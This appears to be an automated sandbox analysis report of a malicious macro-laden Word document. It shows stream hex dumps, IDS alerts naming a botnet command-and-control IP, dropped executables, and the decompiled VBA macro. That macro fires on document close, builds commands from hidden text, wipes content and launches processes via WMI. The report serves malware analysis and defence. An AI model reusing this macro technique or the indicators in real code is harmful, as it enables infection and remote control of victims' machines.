| Stream Path: | \x5DocumentSummaryInformation |
| File Type: | data |
| Stream Size: | 4096 |
| Entropy: | 0.25569624217 |
| Base64 Encoded: | False |
| Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . h . . . . . . . p . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ? ! . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
| Data Raw: | fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 e8 00 00 00 0c 00 00 00 01 00 00 00 68 00 00 00 0f 00 00 00 70 00 00 00 05 00 00 00 7c 00 00 00 06 00 00 00 84 00 00 00 11 00 00 00 8c 00 00 00 17 00 00 00 94 00 00 00 0b 00 00 00 9c 00 00 00 10 00 00 00 a4 00 00 00 13 00 00 00 ac 00 00 00 |
Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096 |
|---|
General | |
|---|---|
| Stream Path: | \x5SummaryInformation |
| File Type: | data |
| Stream Size: | 4096 |
| Entropy: | 0.473780805052 |
| Base64 Encoded: | False |
| Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . l . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . 4 . . . . . . . @ . . . . . . . L . . . . . . . T . . . . . . . \\ . . . . . . . d . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . U s e r . . . . . . . . . . . . . . . . . . . . |
| Data Raw: | fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 6c 01 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 98 00 00 00 03 00 00 00 a4 00 00 00 04 00 00 00 b0 00 00 00 05 00 00 00 c0 00 00 00 06 00 00 00 cc 00 00 00 07 00 00 00 d8 00 00 00 08 00 00 00 ec 00 00 00 09 00 00 00 fc 00 00 00 |
Stream Path: 1Table, File Type: data, Stream Size: 7386 |
|---|
General | |
|---|---|
| Stream Path: | 1Table |
| File Type: | data |
| Stream Size: | 7386 |
| Entropy: | 5.92077573609 |
| Base64 Encoded: | True |
| Data ASCII: | . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . |
| Data Raw: | 1e 06 0f 00 12 00 01 00 78 01 0f 00 07 00 03 00 03 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 |
Stream Path: Data, File Type: data, Stream Size: 187989 |
|---|
General | |
|---|---|
| Stream Path: | Data |
| File Type: | data |
| Stream Size: | 187989 |
| Entropy: | 7.97862280177 |
| Base64 Encoded: | True |
| Data ASCII: | U . . . D . d . . . . . . . . . . . . . . . . . . . . . . 1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . N . . . . . . . . . . . . . . . . . . . C . . . * . . . . A . . . . . . . . . . . . . . . . . . . . . . t . e . m . p . l . a . t . e . . . . . . . . . . . . . . . b . . . . . . . . . . . . b r . . . . 7 . a . _ . . . . . . . . . . . . D . . . . . . . . n . . . . . . . . . b r . . . . 7 . a . _ . . . . P N G . . . . . . . . I H D R . . . O . . . . . . . . . 3 0 . u |
| Data Raw: | 55 de 02 00 44 00 64 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 a3 31 e3 1d c3 03 c3 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 04 f0 4e 00 00 00 b2 04 0a f0 08 00 00 00 01 04 00 00 00 0a 00 00 43 00 0b f0 2a 00 00 00 04 41 01 00 00 00 05 c1 12 00 00 00 06 01 02 00 00 00 ff 01 00 00 08 00 74 00 65 00 |
Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 367 |
|---|
General | |
|---|---|
| Stream Path: | Macros/PROJECT |
| File Type: | ASCII text, with CRLF line terminators |
| Stream Size: | 367 |
| Entropy: | 5.29037636248 |
| Base64 Encoded: | True |
| Data ASCII: | I D = " { D 4 7 2 8 3 5 A - 3 8 9 1 - 4 D B 9 - 8 6 F 0 - 0 C 1 2 4 A F F D 6 E 1 } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 0 8 0 A E 9 E F E D E F E D E F E D E F E D " . . D P B = " 9 6 9 4 7 7 F B 8 B 0 7 1 8 0 8 1 8 0 8 1 8 " . . G C = " 2 4 2 6 C 5 8 9 D D 1 6 D E 1 6 D E E 9 " . . . . [ H o s t E x t e n d e r I n f o ] |
| Data Raw: | 49 44 3d 22 7b 44 34 37 32 38 33 35 41 2d 33 38 39 31 2d 34 44 42 39 2d 38 36 46 30 2d 30 43 31 32 34 41 46 46 44 36 45 31 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4e 61 6d 65 3d 22 50 72 6f 6a 65 63 74 22 0d 0a 48 65 6c 70 43 6f 6e 74 65 78 74 49 44 3d 22 30 22 0d 0a 56 65 72 73 69 6f 6e 43 6f 6d 70 61 74 69 |
Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 41 |
|---|
General | |
|---|---|
| Stream Path: | Macros/PROJECTwm |
| File Type: | data |
| Stream Size: | 41 |
| Entropy: | 3.07738448508 |
| Base64 Encoded: | False |
| Data ASCII: | T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . . . |
| Data Raw: | 54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 00 00 |
Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 2845 |
|---|
General | |
|---|---|
| Stream Path: | Macros/VBA/_VBA_PROJECT |
| File Type: | data |
| Stream Size: | 2845 |
| Entropy: | 4.32828178006 |
| Base64 Encoded: | False |
| Data ASCII: | . a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 . |
| Data Raw: | cc 61 b2 00 00 03 00 ff 09 04 00 00 09 04 00 00 e4 04 03 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00 |
Stream Path: Macros/VBA/dir, File Type: data, Stream Size: 513 |
|---|
General | |
|---|---|
| Stream Path: | Macros/VBA/dir |
| File Type: | data |
| Stream Size: | 513 |
| Entropy: | 6.25624133358 |
| Base64 Encoded: | True |
| Data ASCII: | . . . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . . l . . . . . . . . . Y { . ` . . . . J . < . . . . . r s t d . o l e > . . s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 . 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ S y s t e m 3 . 2 \\ . e 2 . t l b . # O L E A u t . o m a t i o n . ` . . . . E N o r m a l . . E N . C r . m . a Q . F . . . . . . . * . \\ C . . . . . m . . . |
| Data Raw: | 01 fd b1 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 14 08 06 12 09 02 12 80 59 7b a3 60 0a 00 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 10 6f 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e 00 03 2a 00 5c 47 7b 30 30 |
Stream Path: WordDocument, File Type: data, Stream Size: 627764 |
|---|
General | |
|---|---|
| Stream Path: | WordDocument |
| File Type: | data |
| Stream Size: | 627764 |
| Entropy: | 6.04018774642 |
| Base64 Encoded: | False |
| Data ASCII: | . . . . { . . . . . . . . . . . . . . . . . . . . . . . . - . . . . b j b j . . . . . . . . . . . . . . . . . . . . . . . . . . 4 . . . . . . f . . . f . % . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . F . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
| Data Raw: | ec a5 c1 00 7b 00 09 04 00 00 f8 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 eb 2d 09 00 0e 00 62 6a 62 6a 84 bd 84 bd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 04 16 00 34 94 09 00 e6 d7 d5 66 e6 d7 d5 66 eb 25 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 |
Key Decision
Richest Path
Thread / callback creation
Lower opacity -> Library NodeNetwork Behavior |
|---|
Snort IDS Alerts |
|---|
| Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|---|---|---|
| 01/14/21-04:02:18.387074 | TCP | 2404310 | ET CNC Feodo Tracker Reported CnC Server TCP group 6 | 49170 | 80 | 192.168.2.22 | 177.130.51.198 |
| 01/14/21-04:02:20.339180 | ICMP | 449 | ICMP Time-To-Live Exceeded in Transit | 177.130.48.10 | 192.168.2.22 | ||
| 01/14/21-04:02:23.401000 | ICMP | 449 | ICMP Time-To-Live Exceeded in Transit | 177.130.48.10 | 192.168.2.22 |
Network Port Distribution |
|---|
TCP Packets |
|---|
| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|
| Jan 14, 2021 04:02:18.387073994 CET | 49170 | 80 | 192.168.2.22 | 177.130.51.198 |
| Jan 14, 2021 04:02:21.448874950 CET | 49170 | 80 | 192.168.2.22 | 177.130.51.198 |
Code Manipulations |
|---|
Statistics |
|---|
CPU Usage |
|---|
Click to jump to process
Memory Usage |
|---|
Click to jump to process
High Level Behavior Distribution |
|---|
back
Click to dive into process behavior distribution
Behavior |
|---|
Click to jump to process
System Behavior |
|---|
General |
|---|
| Start time: | 04:00:33 |
| Start date: | 14/01/2021 |
| Path: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
| Wow64 process (32bit): | false |
| Commandline: | |
| Imagebase: | 0x13fe60000 |
| File size: | 1424032 bytes |
| MD5 hash: | 95C38D04597050285A18F66039EDB456 |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | C, C++ or other language |
| Reputation: | high |
General |
|---|
| Start time: | 04:01:43 |
| Start date: | 14/01/2021 |
| Path: | C:\Windows\System32\certutil.exe |
| Wow64 process (32bit): | false |
| Commandline: | |
| Imagebase: | 0xff9a0000 |
| File size: | 1192448 bytes |
| MD5 hash: | 4586B77B18FA9A8518AF76CA8FD247D9 |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | C, C++ or other language |
| Reputation: | moderate |
General |
|---|
| Start time: | 04:01:45 |
| Start date: | 14/01/2021 |
| Path: | C:\Windows\System32\svchost.exe |
| Wow64 process (32bit): | false |
| Commandline: | |
| Imagebase: | 0xff0e0000 |
| File size: | 27136 bytes |
| MD5 hash: | C78655BC80301D76ED4FEF1C1EA40A7D |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | C, C++ or other language |
| Reputation: | moderate |
General |
|---|
| Start time: | 04:01:57 |
| Start date: | 14/01/2021 |
| Path: | C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe |
| Wow64 process (32bit): | true |
| Commandline: | |
| Imagebase: | 0x400000 |
| File size: | 344110 bytes |
| MD5 hash: | E87553AEBAC0BF74D165A87321C629BE |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | Visual Basic |
| Yara matches: |
|
| Reputation: | low |
General |
|---|
| Start time: | 04:01:59 |
| Start date: | 14/01/2021 |
| Path: | C:\Windows\SysWOW64\srclient\auditpolmsg.exe |
| Wow64 process (32bit): | true |
| Commandline: | |
| Imagebase: | 0x400000 |
| File size: | 344110 bytes |
| MD5 hash: | E87553AEBAC0BF74D165A87321C629BE |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | Visual Basic |
| Yara matches: |
|
| Reputation: | low |
General |
|---|
| Start time: | 04:02:01 |
| Start date: | 14/01/2021 |
| Path: | C:\Windows\SysWOW64\mfc110\wcnwiz.exe |
| Wow64 process (32bit): | true |
| Commandline: | |
| Imagebase: | 0x400000 |
| File size: | 344110 bytes |
| MD5 hash: | E87553AEBAC0BF74D165A87321C629BE |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | Visual Basic |
| Yara matches: |
|
| Reputation: | low |
General |
|---|
| Start time: | 04:02:04 |
| Start date: | 14/01/2021 |
| Path: | C:\Windows\SysWOW64\capiprovider\SampleRes.exe |
| Wow64 process (32bit): | true |
| Commandline: | |
| Imagebase: | 0x400000 |
| File size: | 344110 bytes |
| MD5 hash: | E87553AEBAC0BF74D165A87321C629BE |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | Visual Basic |
| Yara matches: |
|
| Reputation: | low |
General |
|---|
| Start time: | 04:02:06 |
| Start date: | 14/01/2021 |
| Path: | C:\Windows\SysWOW64\RMActivate_ssp_isv\NlsData0414.exe |
| Wow64 process (32bit): | true |
| Commandline: | |
| Imagebase: | 0x400000 |
| File size: | 344110 bytes |
| MD5 hash: | E87553AEBAC0BF74D165A87321C629BE |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | Visual Basic |
| Yara matches: |
|
| Reputation: | low |
General |
|---|
| Start time: | 04:02:08 |
| Start date: | 14/01/2021 |
| Path: | C:\Windows\SysWOW64\KBDNO\mfc140.exe |
| Wow64 process (32bit): | true |
| Commandline: | |
| Imagebase: | 0x400000 |
| File size: | 344110 bytes |
| MD5 hash: | E87553AEBAC0BF74D165A87321C629BE |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | Visual Basic |
| Yara matches: |
|
| Reputation: | low |
General |
|---|
| Start time: | 04:02:10 |
| Start date: | 14/01/2021 |
| Path: | C:\Windows\SysWOW64\advapi32\ieframe.exe |
| Wow64 process (32bit): | true |
| Commandline: | |
| Imagebase: | 0x400000 |
| File size: | 344110 bytes |
| MD5 hash: | E87553AEBAC0BF74D165A87321C629BE |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | Visual Basic |
| Yara matches: |
|
| Reputation: | low |
General |
|---|
| Start time: | 04:02:13 |
| Start date: | 14/01/2021 |
| Path: | C:\Windows\SysWOW64\nshipsec\cryptdll.exe |
| Wow64 process (32bit): | true |
| Commandline: | |
| Imagebase: | 0x400000 |
| File size: | 344110 bytes |
| MD5 hash: | E87553AEBAC0BF74D165A87321C629BE |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | Visual Basic |
| Yara matches: |
|
| Reputation: | low |
General |
|---|
| Start time: | 04:02:15 |
| Start date: | 14/01/2021 |
| Path: | C:\Windows\SysWOW64\DShowRdpFilter\wlanui.exe |
| Wow64 process (32bit): | true |
| Commandline: | |
| Imagebase: | 0x400000 |
| File size: | 344110 bytes |
| MD5 hash: | E87553AEBAC0BF74D165A87321C629BE |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | Visual Basic |
| Yara matches: |
|
| Reputation: | low |
Disassembly |
|---|
Code Analysis |
|---|
Call Graph |
|---|
Graph
- Entrypoint
- Decryption Function
- Executed
- Not Executed
- Show Help
Module: ThisDocument |
|---|
Declaration |
|---|
| Line | Content |
|---|---|
| 1 | Attribute VB_Name = "ThisDocument" |
| 2 | Attribute VB_Base = "1Normal.ThisDocument" |
| 3 | Attribute VB_GlobalNameSpace = False |
| 4 | Attribute VB_Creatable = False |
| 5 | Attribute VB_PredeclaredId = True |
| 6 | Attribute VB_Exposed = True |
| 7 | Attribute VB_TemplateDerived = True |
| 8 | Attribute VB_Customizable = True |
| 9 | #if VBA7 then |
| 10 | Private Declare PtrSafe Function Sleep Lib "Kernel32" (ByVal One as Long) as Long |
| 11 | #else |
| 12 | Private Declare Function Sleep Lib "Kernel32" (ByVal One as Long) as Long |
| 13 | #endif |
| 14 | Private Ms13 |
| 15 | Private One as String |
| 16 | Private Two as String |
| 17 | Private STP as String |
Executed Functions |
|---|
| APIs | Meta Information |
|---|---|
Part of subcall function Button_Click2@ThisDocument: Left | |
Part of subcall function Button_Click2@ThisDocument: Paragraphs | |
CreateObject | CreateObject( |
Part of subcall function Button_Click2@ThisDocument: Left | |
Part of subcall function Button_Click2@ThisDocument: Paragraphs | |
Part of subcall function Button_Click2@ThisDocument: Left | |
Part of subcall function Button_Click2@ThisDocument: Paragraphs | |
Part of subcall function Button_Click2@ThisDocument: Left | |
Part of subcall function Button_Click2@ThisDocument: Paragraphs | |
Delete | |
Part of subcall function SaveAs3@ThisDocument: SaveAs2 | |
Part of subcall function SaveAs3@ThisDocument: wdFormatText | |
Part of subcall function SaveAs3@ThisDocument: SaveAs2 | |
Part of subcall function SaveAs3@ThisDocument: wdFormatText | |
Part of subcall function SetTask@ThisDocument: create | |
Part of subcall function SetTask@ThisDocument: act | |
Kernel32!Sleep | Kernel32!Sleep( |
Part of subcall function SetTask@ThisDocument: create | |
Part of subcall function SetTask@ThisDocument: act |
| Strings | Decrypted Strings |
|---|---|
| "xls" | |
| "doc" |
| Line | Instruction | Meta Information |
|---|---|---|
| 22 | Private Sub Form_Close() | |
| 23 | STP = Button_Click2(2, 16) + "Ksh1" | executed |
| 24 | Set Ms13 = CreateObject(Button_Click2(4, 22)) | CreateObject( |
| 25 | One = Button_Click2(8, 16) | |
| 26 | Two = Button_Click2(6, 8) | |
| 27 | ActiveDocument.Range(Start := 0, End := 3561).Delete | Delete |
| 28 | SaveAs3 ("xls") | |
| 28 | SaveAs3 ("doc") | |
| 29 | SetTask (One + " " + STP + ".xls " + STP + ".pdf") | |
| 29 | Sleep 6000 | Kernel32!Sleep( |
| 29 | SetTask (Two + " " + STP + ".pdf,In") | |
| 30 | End Sub |
| APIs | Meta Information |
|---|---|
Part of subcall function Form_Close@ThisDocument: CreateObject | |
Part of subcall function Form_Close@ThisDocument: Delete | |
Part of subcall function Form_Close@ThisDocument: Sleep |
| Line | Instruction | Meta Information |
|---|---|---|
| 19 | Private Sub Document_Close() | |
| 20 | Form_Close | executed |
| 21 | End Sub |
| APIs | Meta Information |
|---|---|
create | SWbemObjectEx.create( |
act |
| Line | Instruction | Meta Information |
|---|---|---|
| 40 | Private Function SetTask(Task as String) | |
| 41 | Ms13.create Task, Null, Null, act | SWbemObjectEx.create( act executed |
| 42 | End Function |
| APIs | Meta Information |
|---|---|
Left | |
Paragraphs |
| Line | Instruction | Meta Information |
|---|---|---|
| 31 | Private Function Button_Click2(One as Long, Two as Long) as String | |
| 32 | Button_Click2 = Left(ActiveDocument.Paragraphs(One).Range.Text, Two) | Left Paragraphs executed |
| 33 | End Function |
| APIs | Meta Information |
|---|---|
SaveAs2 | |
wdFormatText |
| Line | Instruction | Meta Information |
|---|---|---|
| 37 | Private Function SaveAs3(Formt as String) | |
| 38 | ActiveDocument.SaveAs2 FileName := STP + "." + Formt, FileFormat := wdFormatText | SaveAs2 wdFormatText executed |
| 39 | End Function |
Non-Executed Functions |
|---|
| APIs | Meta Information |
|---|---|
Right | |
Text | |
Range |
| Line | Instruction | Meta Information |
|---|---|---|
| 34 | Private Function Button_Click3(One as Long) as String | |
| 35 | Button_Click3 = Right(Range.Text, One) | Right Text Range |
| 36 | End Function |
Execution Graph |
|---|
| Execution Coverage: | 9% |
| Dynamic/Decrypted Code Coverage: | 100% |
| Signature Coverage: | 9.6% |
| Total number of Nodes: | 1182 |
| Total number of Limit Nodes: | 56 |
Graph
Executed Functions |
|---|
Control-flow Graph |
|---|
| APIs |
|
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 003F9860, Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 195serviceCOMMON
Download Yara Rule
Control-flow Graph |
|---|
| C-Code - Quality: 73% |
|
| APIs |
| Strings |
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Yara matches |
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 003F38F0, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 189fileCOMMON
Download Yara Rule
Control-flow Graph |
|---|
| C-Code - Quality: 63% |
|
| APIs |
|
| Strings |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Yara matches |
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
| C-Code - Quality: 61% |
|
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Yara matches |
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 003F80A0, Relevance: 1.7, APIs: 1, Instructions: 219fileCOMMON
Download Yara Rule
| C-Code - Quality: 66% |
|
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Yara matches |
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 004197A0, Relevance: 341.2, APIs: 167, Strings: 27, Instructions: 1699COMMON
Download Yara Rule
| APIs |
|
| Strings |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 00415D80, Relevance: 188.2, APIs: 105, Strings: 2, Instructions: 932COMMON
Download Yara Rule
Control-flow Graph |
|---|
| APIs |
|
| Strings |
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Control-flow Graph |
|---|
| APIs |
|
| Strings |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 00422660, Relevance: 19.6, APIs: 13, Instructions: 112COMMON
Download Yara Rule
Control-flow Graph |
|---|
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 003F8400, Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 172fileCOMMON
Download Yara Rule
Control-flow Graph |
|---|
| C-Code - Quality: 66% |
|
| APIs |
|
| Strings |
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Yara matches |
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Control-flow Graph |
|---|
| APIs |
|
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Control-flow Graph |
|---|
| C-Code - Quality: 62% |
|
| APIs |
|
| Strings |
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Yara matches |
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 003F7120, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 107libraryCOMMON
Download Yara Rule
Control-flow Graph |
|---|
| C-Code - Quality: 85% |
|
| APIs |
|
| Strings |
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Yara matches |
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 003F4B70, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 87processCOMMON
Download Yara Rule
Control-flow Graph |
|---|
| C-Code - Quality: 60% |
|
| APIs |
|
| Strings |
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Yara matches |
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 003F30A0, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 165memoryCOMMON
Download Yara Rule
Control-flow Graph |
|---|
| C-Code - Quality: 71% |
|
| APIs |
|
| Strings |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Yara matches |
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Control-flow Graph |
|---|
| APIs |
|
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 003F5CE0, Relevance: 3.0, APIs: 2, Instructions: 13COMMON
Download Yara Rule
Control-flow Graph |
|---|
| C-Code - Quality: 100% |
|
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Yara matches |
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Control-flow Graph |
|---|
| APIs |
|
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 00402064, Relevance: 1.8, APIs: 1, Instructions: 278COMMON
Download Yara Rule
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
| C-Code - Quality: 75% |
|
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Yara matches |
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 003E0170, Relevance: 1.4, APIs: 1, Instructions: 163COMMON
Download Yara Rule
| APIs |
|
| Memory Dump Source |
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Non-executed Functions |
|---|
| APIs |
|
| Strings |
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 003F65E0, Relevance: 12.9, APIs: 2, Strings: 5, Instructions: 647COMMONCrypto
Download Yara Rule
| C-Code - Quality: 81% |
|
| APIs |
| Strings |
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Yara matches |
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
| C-Code - Quality: 59% |
|
| Strings |
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Yara matches |
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 003F8970, Relevance: 2.7, Strings: 2, Instructions: 165COMMON
Download Yara Rule
| C-Code - Quality: 65% |
|
| Strings |
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Yara matches |
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
| C-Code - Quality: 66% |
|
| Strings |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Yara matches |
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
